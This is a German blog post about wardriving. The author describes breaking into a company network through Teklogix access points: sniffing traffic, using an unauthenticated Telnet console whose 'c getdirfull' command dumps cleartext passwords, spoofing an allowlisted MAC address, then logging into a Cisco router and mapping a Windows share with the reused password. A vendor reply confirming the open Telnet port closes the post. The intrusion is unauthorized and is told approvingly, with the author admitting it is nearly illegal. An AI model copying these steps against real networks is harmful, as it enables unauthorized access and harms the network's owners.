TEKLOGIX AP's mit Hintertür, wegen falscher Konfiguration |
Manchmal beisse ich wirklich in die Tastatur meines Notebook's. Also fangen wir mal an, auf einer Tour habe ich
festgestellt, dass an einem Ort sich etwa 5 TEKLOGIX AP's melden, nicht sehr stark, aber eben, die Anzahl 5 lässt
einen ja doch aufhorchen. Also bin ich mal in einer freien Stunde dort vorbeigefahren und habe mich auf einen
Parkplatz gestellt. Also allzuguter Empfang hatte ich nicht, aber doch ausreichend. Nun mal den Packet Sniffer laufen lassen,
denn eine IP habe ich nicht per DHCP bekommen. Nach einiger Zeit, war aber klar welcher IP Adressbereich benutzt wird.
so dass ich mir halt selbst eine eingerichtet habe. Und oh Wunder Wahnsinn, ich komme nicht viel weiter. Aha, da hat sich also ein
Administrator doch einige Mühe gegeben, ODER ?. Aber seltsamerweise sehe ich den AP, dort ist Port 80 und Port 23 offen.
Nunja, den Webbrowser starten und sehen, aber der AP wollte ein Login. Und ich habe ja keines, noch keines.
Jetzt halt mal eine Telnet Session auf den AP, und hier wollte er dann seltsamerweise kein Passwort? Was mich nun
doch etwas verwirrte. Doch zuerst ein Auszug aus dem Telnet Session:New Telnet Console Client Attached. >help >Network Console built-in commands: > >help [keys] >log [openIch sollte mir doch mal ein Manual des Teklogix AP's auf mein Notebook kopieren. :-) Aber ev. kriege ich es ja ohne heraus. Es hat ja eine Online Hilfe zu jedem Kommando. >net >net help n>======== The NET command line interface ========================== n> pingIntressant war dann der Befehl " >c getdirfull", der liefert einem die Komplette Konfiguration. :-) >c getdirfull c>>>> filter.macaddress.1.configured = "1" c>>>> filter.macaddress.1.macaddress = "00:xx:xx:xx:xx:xx" c>>>> filter.macaddress.1.name = "caxxxxxx" c>>>> filter.macaddress.2.configured = "1" c>>>> filter.macaddress.2.macaddress = "00:yy:yy:yy:yy:yy" c>>>> filter.macaddress.2.name = "cayyyyyy" c>>>> filter.macaddress.3.configured = "1" . . hier stehen noch einige weiter MAC Adressen . c>>>> filter.macaddress.enabled = "1" c>>>> filter.storm.restart = "28" c>>>> interface.1.defaultipaddress = "192.168.XXX.XXX" c>>>> interface.1.defaultsubnetmask = "255.255.255.0" c>>>> interface.1.ethernet.macaddress = "00:c0:af:XX:XX:XX" c>>>> interface.1.ipaddress = "192.168.XXX.XXX" c>>>> interface.1.subnetmask = "255.255.255.0" c>>>> interface.1.type = "Onboard Ethernet" c>>>> interface.2.dot11.ds.channel = "13" c>>>> interface.2.dot11.macaddress = "00:60:1d:XX:XX:XX" c>>>> interface.2.dot11.regulatorydomain = "ETSI-Europe (0x30)" c>>>> interface.2.enabled = "1" c>>>> interface.2.type = "IEEE 802.11 DS" c>>>> radiolinkfeatures.bootnum = "9" c>>>> radiolinkfeatures.cellular = "0" c>>>> radiolinkfeatures.tcpdirect = "1" c>>>> system.bootcodeversion = "D059Q" c>>>> system.defaultgateway = "192.168.XXX.XXX" c>>>> system.dobootp = "0" c>>>> system.flashsize = "2097152" c>>>> system.gateway = "192.168.XXX.XXX" c>>>> system.ipaddress = "192.168.XXX.XXX" c>>>> system.softwareversion = "C130T" c>>>> system.sramsize = "16777216" c>>>> system.subnetmask = "255.255.255.0" c>>>> users.1.configured = "1" c>>>> users.1.name = "user" c>>>> users.1.password = "XYZXYZ" c>>>> users.2.configured = "1" c>>>> users.2.name = "administrator" c>>>> users.2.password = "ZZZZZZZZZ"Also das ist doch der Hammer, wenn die Konfiguration ausgelesen wird, kommt das Passwort im Klartext, (hier wurde es durch uns ersetzt mit ZZZZZZZZ und XYZXYZ). Also der AP wird als Brige eingesetzt, der nur bestimmte MAC Adressen zulässt. Aber was solls, da ich jetzt ja die Passw&oumall;rter kenne, kann ich mich ja selber eintragen. Einfach via Browser die MAC Adresse von mir eintragen und dann sollte es ja gehen. Doch halt!Ist das denn nicht schon Illegal? Da werden Daten verändert. Ab jetzt kommt mein Linux System zum Zug, denn dort kann man ohne Probleme die Mac Adresse anpassen, zum Beispiel in 00:de.ad:00:be:ef oder 00:af:fe:00:00:00 oder aber in eine, die schon in der MAC Adessen Liste eingetragen ist. Dann muss ich nur eine Anpassungen auf meinem Notebook vornehmen. Und kaum war die Adresse auf dem Notebook gesetzt, kann man nun das ganze Netzwerk sehen und Benutzen. Aber da wir uns ja schon fast im Illegale Berreich aufhalten, haben wir nur noch schnell 2 Test's gemacht. Eine kleine Telnet Verbindung auf den Cisco Router und schnell ein Versuch, einen Share auf einem Windoof System zu mappen. Also der Router hat, wehn wundert es, das gleiche Passwort wie der AP, User Access Verification Password: RouterW2>enable Password: RouterW2#sh ru Building configuration... Current configuration: ! version 11.2 no service udp-small-servers no service tcp-small-servers ! hostname RouterW2 ! enable password ZZZZZZZZZ ! ipx routing 0060.XXXX.XXXX ! interface Ethernet0 ip address 192.168.XXX.XXX 255.255.255.0 ip helper-address XXX.XXX.XXX.XXX ipx network 8600XXXX ! interface Serial0 ip address 192.168.XXX.XXX 255.255.255.252 ipx network 8600XXYYY ! router eigrp 100 network 192.168.XXX.XXXAuch dieser Router ist nicht sehr Optimal konfiguriert, und den IP Adressen können wir entnehmen, dass sich hier noch ein grösseres Netzwerk verbirgt. Und das mit dem Netzwerkshare mappen war auch ein sauberer Erfolg, wir schliessen daraus, dass auf allen Geräten dasselbe Passort ist. Auch hier werden Grundsatzregeln für Administratoren gebochen. Aber es macht das Leben eben doch einfacher, wenn man sich nur ein Passwort merken muss. AnmerkungOb diese Hintertür ein Gundsätziches Problem bei diesem AP ist, oder er nur durch eine Falsche Konfiguration entstanden ist, kann zurzeit noch nicht gesagt werden. Das müssen wir an anderen TEKLOGIX AP's herausfinden.NachtragHier die Offizielle Antwort auf unseren Bericht hier:Der Zugriff auf den Teklogix AP via Port23 ist leider auch bei der neusten Firmwareversion nicht passwortgeschützt. Somit handelt es sich hierbei weder um eine Unterlassung noch um einen Konfigurationsfehler. Das Auflisten des User/Passwort bei Liste c getdirfull wird aber bei den neueren Firmwares unterdrückt.Dem ist hier nichts mehr hinzuzufügen, oder ????? ;-) |